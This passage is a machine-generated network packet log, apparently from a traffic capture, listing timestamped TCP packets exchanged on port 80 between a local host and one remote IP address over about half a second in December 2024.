                                                                                                                                                                Dec 13, 2024 01:37:07.849818945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.849936962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.850023031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.850723982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.850836039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.850914955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.851686954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.851818085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.851931095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.852540016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.852652073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.852745056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.853399038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.895307064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.997838020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.997921944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.998143911 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.998213053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.998346090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.998354912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.998550892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.999105930 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.999212980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.999345064 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.000010014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.000211000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.000368118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.000910997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.001054049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.001188040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.001821995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.001961946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.002090931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.002775908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.002871037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.002999067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.003631115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.003767967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.003895044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.004548073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.004674911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.004800081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.005465984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.005585909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.005728960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.006398916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.006568909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.006706953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.007257938 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.007397890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.007524014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.008189917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.008359909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.008496046 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.009076118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.009208918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.009336948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.009987116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.010076046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.010204077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.010899067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.011081934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.011209011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.011807919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.011914968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.012041092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.012725115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.012837887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.012967110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.013770103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.013823986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.013950109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.014563084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.014666080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.014791965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.015449047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.015557051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.015685081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.016345024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.016462088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.016588926 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.017271042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.017390013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.017519951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.018193960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.018364906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.018493891 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.019098043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.019186020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.019320965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.020029068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.020086050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.020212889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.020929098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.021128893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.021258116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.021831036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.022015095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.022142887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.022756100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.022871017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.023034096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.023653984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.023782015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.023927927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.024561882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.024684906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.024812937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.025469065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.025600910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.025729895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.026382923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.026456118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.026583910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.027256012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.027455091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.027584076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.028173923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.028228998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.028357029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.029090881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.029227972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.029357910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.029997110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.030142069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.030271053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.030924082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.031048059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.031181097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.031826019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.031965017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.032092094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.032720089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.032840967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.032968044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.033639908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.033760071 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.033890009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.034548044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.034718990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.034847975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.035465956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.035520077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.035645962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.036369085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.036535978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.036664009 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.037269115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.037399054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.037529945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.038192987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.038322926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.038450956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.039206982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.039340973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.039465904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.039999008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.040122032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.040249109 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.040923119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.041134119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.041264057 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.041822910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.041934013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.042059898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.042778015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.042872906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.043000937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.043647051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.043761969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.043893099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.044569016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.044634104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.044764996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.045419931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.098417997 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.189466000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.189570904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.189709902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.189867020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.190015078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.190067053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.190109015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.190943003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.191025972 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.191034079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.191823959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.191905022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.191914082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.192743063 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.192819118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.192878008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.193630934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.193711996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.193757057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.194549084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.194614887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.194622993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.195466042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.195542097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.195590019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.196358919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.196445942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.196492910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.197262049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.197354078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.197431087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.198193073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.198273897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.198308945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.199134111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.199198961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.199225903 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.200015068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.200073957 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.200114012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.200916052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.200994968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.201034069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.201802969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.201893091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.201931000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.202727079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.202805042 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.202841043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.203643084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.203722000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.203732967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.204545021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.204598904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.204616070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.205436945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.205512047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.205549955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.206330061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.206396103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.206455946 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.207279921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.207345963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.207376957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.208178997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.208257914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.208296061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.209081888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.209178925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.209261894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.210004091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.210072994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.210127115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.210949898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.211030006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.211059093 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.211822033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.211893082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.211945057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.212702990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.212781906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.212853909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.213641882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.213711977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.213730097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.214567900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.214643955 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.214669943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.215462923 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.215543032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.215590000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.216360092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.216435909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.216475010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.217274904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.217351913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.217396021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.218190908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.218267918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.218313932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.219156027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.219221115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.219266891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.220016956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.220097065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.220115900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.220916033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.220993042 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.221026897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.221813917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.221896887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.221930981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.222728968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.222788095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.222824097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.223642111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.223705053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.223752975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.224558115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.224618912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.224663019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.225449085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:08.225516081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:08.225560904 CET8049707185.81.68.147192.168.2.5
